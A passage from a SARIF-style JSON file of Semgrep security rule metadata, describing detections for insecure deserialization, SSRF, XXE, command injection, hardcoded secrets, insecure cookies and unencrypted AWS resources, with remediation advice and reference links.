`ObjectInputStream#resolveClass()` method or using a safe replacement for the generic `readObject()` method."},"helpUri":"https://semgrep.dev/r/java.micronaut.deserialization.objectinputstream-deserialization.objectinputstream-deserialization","id":"java.micronaut.deserialization.objectinputstream-deserialization.objectinputstream-deserialization","name":"java.micronaut.deserialization.objectinputstream-deserialization.objectinputstream-deserialization","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.micronaut.deserialization.objectinputstream-deserialization.objectinputstream-deserialization"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected the use of exec(). exec() can be dangerous if used to evaluate dynamic content. If this content can be input from outside the program, this may be a code injection vulnerability. Ensure evaluated content is not definable by external sources."},"help":{"markdown":"Detected the use of exec(). exec() can be dangerous if used to evaluate dynamic content. If this content can be input from outside the program, this may be a code injection vulnerability. Ensure evaluated content is not definable by external sources.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.exec-detected.exec-detected)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Detected the use of exec(). exec() can be dangerous if used to evaluate dynamic content. If this content can be input from outside the program, this may be a code injection vulnerability. Ensure evaluated content is not definable by external sources."},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.exec-detected.exec-detected","id":"python.lang.security.audit.exec-detected.exec-detected","name":"python.lang.security.audit.exec-detected.exec-detected","properties":{"precision":"very-high","tags":["CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.exec-detected.exec-detected"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Session cookie `Secure` flag is explicitly disabled. The `secure` flag for cookies prevents the client from transmitting the cookie over insecure channels such as HTTP. Set the `Secure` flag by setting `secure` to `true` in configuration file."},"help":{"markdown":"Session cookie `Secure` flag is explicitly disabled. The `secure` flag for cookies prevents the client from transmitting the cookie over insecure channels such as HTTP. Set the `Secure` flag by setting `secure` to `true` in configuration file.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/scala.play.security.conf-insecure-cookie-settings.conf-insecure-cookie-settings)\n - [https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies#security](https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies#security)\n - [https://www.playframework.com/documentation/2.8.x/SettingsSession#Session-Configuration](https://www.playframework.com/documentation/2.8.x/SettingsSession#Session-Configuration)\n","text":"Session cookie `Secure` flag is explicitly disabled. The `secure` flag for cookies prevents the client from transmitting the cookie over insecure channels such as HTTP. Set the `Secure` flag by setting `secure` to `true` in configuration file."},"helpUri":"https://semgrep.dev/r/scala.play.security.conf-insecure-cookie-settings.conf-insecure-cookie-settings","id":"scala.play.security.conf-insecure-cookie-settings.conf-insecure-cookie-settings","name":"scala.play.security.conf-insecure-cookie-settings.conf-insecure-cookie-settings","properties":{"precision":"very-high","tags":["CWE-614: Sensitive Cookie in HTTPS Session Without 'Secure' Attribute","MEDIUM CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: scala.play.security.conf-insecure-cookie-settings.conf-insecure-cookie-settings"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected direct use of jinja2. If not done properly, this may bypass HTML escaping which opens up the application to cross-site scripting (XSS) vulnerabilities. Prefer using the Flask method 'render_template()' and templates with a '.html' extension in order to prevent XSS."},"help":{"markdown":"Detected direct use of jinja2. If not done properly, this may bypass HTML escaping which opens up the application to cross-site scripting (XSS) vulnerabilities. Prefer using the Flask method 'render_template()' and templates with a '.html' extension in order to prevent XSS.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.security.xss.audit.direct-use-of-jinja2.direct-use-of-jinja2)\n - [https://jinja.palletsprojects.com/en/2.11.x/api/#basics](https://jinja.palletsprojects.com/en/2.11.x/api/#basics)\n","text":"Detected direct use of jinja2. If not done properly, this may bypass HTML escaping which opens up the application to cross-site scripting (XSS) vulnerabilities. Prefer using the Flask method 'render_template()' and templates with a '.html' extension in order to prevent XSS."},"helpUri":"https://semgrep.dev/r/python.flask.security.xss.audit.direct-use-of-jinja2.direct-use-of-jinja2","id":"python.flask.security.xss.audit.direct-use-of-jinja2.direct-use-of-jinja2","name":"python.flask.security.xss.audit.direct-use-of-jinja2.direct-use-of-jinja2","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.security.xss.audit.direct-use-of-jinja2.direct-use-of-jinja2"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"RDS instance or cluster with hardcoded credentials in source code. It is recommended to pass the credentials at runtime, or generate random credentials using the random_password resource."},"help":{"markdown":"RDS instance or cluster with hardcoded credentials in source code. It is recommended to pass the credentials at runtime, or generate random credentials using the random_password resource.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.lang.security.rds-insecure-password-storage-in-source-code.rds-insecure-password-storage-in-source-code)\n - [https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/db_instance#master_password](https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/db_instance#master_password)\n - [https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/rds_cluster#master_password](https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/rds_cluster#master_password)\n - [https://registry.terraform.io/providers/hashicorp/random/latest/docs/resources/password](https://registry.terraform.io/providers/hashicorp/random/latest/docs/resources/password)\n","text":"RDS instance or cluster with hardcoded credentials in source code. It is recommended to pass the credentials at runtime, or generate random credentials using the random_password resource."},"helpUri":"https://semgrep.dev/r/terraform.lang.security.rds-insecure-password-storage-in-source-code.rds-insecure-password-storage-in-source-code","id":"terraform.lang.security.rds-insecure-password-storage-in-source-code.rds-insecure-password-storage-in-source-code","name":"terraform.lang.security.rds-insecure-password-storage-in-source-code.rds-insecure-password-storage-in-source-code","properties":{"precision":"very-high","tags":["CWE-522: Insufficiently Protected Credentials","MEDIUM CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.lang.security.rds-insecure-password-storage-in-source-code.rds-insecure-password-storage-in-source-code"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.spring.tainted-ssrf-spring-format.tainted-ssrf-spring-format)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/kotlin.spring.tainted-ssrf-spring-format.tainted-ssrf-spring-format","id":"kotlin.spring.tainted-ssrf-spring-format.tainted-ssrf-spring-format","name":"kotlin.spring.tainted-ssrf-spring-format.tainted-ssrf-spring-format","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","HIGH CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.spring.tainted-ssrf-spring-format.tainted-ssrf-spring-format"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The AWS EBS volume is unencrypted. The volume, the disk I/O and any derived snapshots could be read if compromised. Volumes should be encrypted to ensure sensitive data is stored securely."},"help":{"markdown":"The AWS EBS volume is unencrypted. The volume, the disk I/O and any derived snapshots could be read if compromised. Volumes should be encrypted to ensure sensitive data is stored securely.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-ebs-volume-unencrypted.aws-ebs-volume-unencrypted)\n - [https://owasp.org/Top10/A04_2021-Insecure_Design](https://owasp.org/Top10/A04_2021-Insecure_Design)\n - [https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/ebs_volume#encrypted](https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/ebs_volume#encrypted)\n - [https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSEncryption.html](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSEncryption.html)\n","text":"The AWS EBS volume is unencrypted. The volume, the disk I/O and any derived snapshots could be read if compromised. Volumes should be encrypted to ensure sensitive data is stored securely."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-ebs-volume-unencrypted.aws-ebs-volume-unencrypted","id":"terraform.aws.security.aws-ebs-volume-unencrypted.aws-ebs-volume-unencrypted","name":"terraform.aws.security.aws-ebs-volume-unencrypted.aws-ebs-volume-unencrypted","properties":{"precision":"very-high","tags":["CWE-311: Missing Encryption of Sensitive Data","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-ebs-volume-unencrypted.aws-ebs-volume-unencrypted"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.superagent.hardcoded-bearer-token.hardcoded-bearer-token)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/javascript.superagent.hardcoded-bearer-token.hardcoded-bearer-token","id":"javascript.superagent.hardcoded-bearer-token.hardcoded-bearer-token","name":"javascript.superagent.hardcoded-bearer-token.hardcoded-bearer-token","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.superagent.hardcoded-bearer-token.hardcoded-bearer-token"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The AWS Kinesis stream does not encrypt data at rest. The data could be read if the Kinesis stream storage layer is compromised. Enable Kinesis stream server-side encryption."},"help":{"markdown":"The AWS Kinesis stream does not encrypt data at rest. The data could be read if the Kinesis stream storage layer is compromised. Enable Kinesis stream server-side encryption.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-kinesis-stream-unencrypted.aws-kinesis-stream-unencrypted)\n - [https://owasp.org/Top10/A04_2021-Insecure_Design](https://owasp.org/Top10/A04_2021-Insecure_Design)\n - [https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/kinesis_stream#encryption_type](https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/kinesis_stream#encryption_type)\n - [https://docs.aws.amazon.com/streams/latest/dev/server-side-encryption.html](https://docs.aws.amazon.com/streams/latest/dev/server-side-encryption.html)\n","text":"The AWS Kinesis stream does not encrypt data at rest. The data could be read if the Kinesis stream storage layer is compromised. Enable Kinesis stream server-side encryption."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-kinesis-stream-unencrypted.aws-kinesis-stream-unencrypted","id":"terraform.aws.security.aws-kinesis-stream-unencrypted.aws-kinesis-stream-unencrypted","name":"terraform.aws.security.aws-kinesis-stream-unencrypted.aws-kinesis-stream-unencrypted","properties":{"precision":"very-high","tags":["CWE-311: Missing Encryption of Sensitive Data","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-kinesis-stream-unencrypted.aws-kinesis-stream-unencrypted"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a request using 'http://'. This request will be unencrypted. Use 'https://' instead."},"help":{"markdown":"Detected a request using 'http://'. This request will be unencrypted. Use 'https://' instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.insecure-transport.requests.request-session-with-http.request-session-with-http)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Detected a request using 'http://'. This request will be unencrypted. Use 'https://' instead."},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.insecure-transport.requests.request-session-with-http.request-session-with-http","id":"python.lang.security.audit.insecure-transport.requests.request-session-with-http.request-session-with-http","name":"python.lang.security.audit.insecure-transport.requests.request-session-with-http.request-session-with-http","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.insecure-transport.requests.request-session-with-http.request-session-with-http"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Service is disabling TLS certificate verification when communicating with the server. This makes your HTTPS connections insecure. Remove the 'insecureSkipTLSVerify: true' key to secure communication."},"help":{"markdown":"Service is disabling TLS certificate verification when communicating with the server. This makes your HTTPS connections insecure. Remove the 'insecureSkipTLSVerify: true' key to secure communication.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/yaml.kubernetes.security.skip-tls-verify-service.skip-tls-verify-service)\n - [https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.20/#apiservice-v1-apiregistration-k8s-io](https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.20/#apiservice-v1-apiregistration-k8s-io)\n","text":"Service is disabling TLS certificate verification when communicating with the server. This makes your HTTPS connections insecure. Remove the 'insecureSkipTLSVerify: true' key to secure communication."},"helpUri":"https://semgrep.dev/r/yaml.kubernetes.security.skip-tls-verify-service.skip-tls-verify-service","id":"yaml.kubernetes.security.skip-tls-verify-service.skip-tls-verify-service","name":"yaml.kubernetes.security.skip-tls-verify-service.skip-tls-verify-service","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: yaml.kubernetes.security.skip-tls-verify-service.skip-tls-verify-service"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"A formatted or concatenated string was detected as input to a java.lang.Runtime call. This is dangerous if a variable is controlled by user input and could result in a command injection. Ensure your variables are not controlled by users or sufficiently sanitized."},"help":{"markdown":"A formatted or concatenated string was detected as input to a java.lang.Runtime call. This is dangerous if a variable is controlled by user input and could result in a command injection. Ensure your variables are not controlled by users or sufficiently sanitized.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.lang.security.command-injection-formatted-runtime-call.command-injection-formatted-runtime-call)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"A formatted or concatenated string was detected as input to a java.lang.Runtime call. This is dangerous if a variable is controlled by user input and could result in a command injection. Ensure your variables are not controlled by users or sufficiently sanitized."},"helpUri":"https://semgrep.dev/r/kotlin.lang.security.command-injection-formatted-runtime-call.command-injection-formatted-runtime-call","id":"kotlin.lang.security.command-injection-formatted-runtime-call.command-injection-formatted-runtime-call","name":"kotlin.lang.security.command-injection-formatted-runtime-call.command-injection-formatted-runtime-call","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.lang.security.command-injection-formatted-runtime-call.command-injection-formatted-runtime-call"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The object is passed strictly to jose.JWT.sign(...) Make sure that sensitive information is not exposed through JWT token payload."},"help":{"markdown":"The object is passed strictly to jose.JWT.sign(...) Make sure that sensitive information is not exposed through JWT token payload.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.jose.security.audit.jose-exposed-data.jose-exposed-data)\n - [https://owasp.org/Top10/A04_2021-Insecure_Design](https://owasp.org/Top10/A04_2021-Insecure_Design)\n","text":"The object is passed strictly to jose.JWT.sign(...) Make sure that sensitive information is not exposed through JWT token payload."},"helpUri":"https://semgrep.dev/r/javascript.jose.security.audit.jose-exposed-data.jose-exposed-data","id":"javascript.jose.security.audit.jose-exposed-data.jose-exposed-data","name":"javascript.jose.security.audit.jose-exposed-data.jose-exposed-data","properties":{"precision":"very-high","tags":["CWE-522: Insufficiently Protected Credentials","LOW CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.jose.security.audit.jose-exposed-data.jose-exposed-data"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `joblib.load()` function uses `pickle` for object deserialization and should not be used with untrusted data."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `joblib.load()` function uses `pickle` for object deserialization and should not be used with untrusted data.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.deserialization.tainted-joblib-django.tainted-joblib-django)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://dill.readthedocs.io/en/latest/index.html](https://dill.readthedocs.io/en/latest/index.html)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://joblib.readthedocs.io/en/latest/generated/joblib.load.html/](https://joblib.readthedocs.io/en/latest/generated/joblib.load.html/)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `joblib.load()` function uses `pickle` for object deserialization and should not be used with untrusted data."},"helpUri":"https://semgrep.dev/r/python.django.deserialization.tainted-joblib-django.tainted-joblib-django","id":"python.django.deserialization.tainted-joblib-django.tainted-joblib-django","name":"python.django.deserialization.tainted-joblib-django.tainted-joblib-django","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.deserialization.tainted-joblib-django.tainted-joblib-django"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The current configuration allows for XXE attacks through parameter entities. It is our recommendation to secure this parser against XXE attacks by configuring $PARSER with `$PARSER.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks with parameter entities. `$PARSER.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The current configuration allows for XXE attacks through parameter entities. It is our recommendation to secure this parser against XXE attacks by configuring $PARSER with `$PARSER.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks with parameter entities. `$PARSER.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.xxe.saxreader-xxe-parameter-entities.saxreader-xxe-parameter-entities)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/returntocorp/java-xxe-research](https://github.com/returntocorp/java-xxe-research)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The current configuration allows for XXE attacks through parameter entities. It is our recommendation to secure this parser against XXE attacks by configuring $PARSER with `$PARSER.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks with parameter entities. `$PARSER.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/kotlin.xxe.saxreader-xxe-parameter-entities.saxreader-xxe-parameter-entities","id":"kotlin.xxe.saxreader-xxe-parameter-entities.saxreader-xxe-parameter-entities","name":"kotlin.xxe.saxreader-xxe-parameter-entities.saxreader-xxe-parameter-entities","properties":{"precision":"very-high","tags":["CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.xxe.saxreader-xxe-parameter-entities.saxreader-xxe-parameter-entities"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A cookie was detected without setting the 'HttpOnly' flag. The 'HttpOnly' flag for cookies instructs the browser to forbid client-side scripts from reading the cookie. Set the 'HttpOnly' flag by calling 'cookie.setHttpOnly(true);'"},"help":{"markdown":"A cookie was detected without setting the 'HttpOnly' flag. The 'HttpOnly' flag for cookies instructs the browser to forbid client-side scripts from reading the cookie. Set the 'HttpOnly' flag by calling 'cookie.setHttpOnly(true);'\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.cookie-missing-httponly.cookie-missing-httponly)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"A cookie was detected without setting the 'HttpOnly' flag. The 'HttpOnly' flag for cookies instructs the browser to forbid client-side scripts from reading the cookie. Set the 'HttpOnly' flag by calling 'cookie.setHttpOnly(true);'"},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.cookie-missing-httponly.cookie-missing-httponly","id":"java.lang.security.audit.cookie-missing-httponly.cookie-missing-httponly","name":"java.lang.security.audit.cookie-missing-httponly.cookie-missing-httponly","properties":{"precision":"very-high","tags":["CWE-1004: Sensitive Cookie Without 'HttpOnly' Flag","LOW CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.cookie-missing-httponly.cookie-missing-httponly"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.gin.ssrf.gin-tainted-url-host.gin-tainted-url-host)\n - [https://goteleport.com/blog/ssrf-attacks/](https://goteleport.com/blog/ssrf-attacks/)\n - 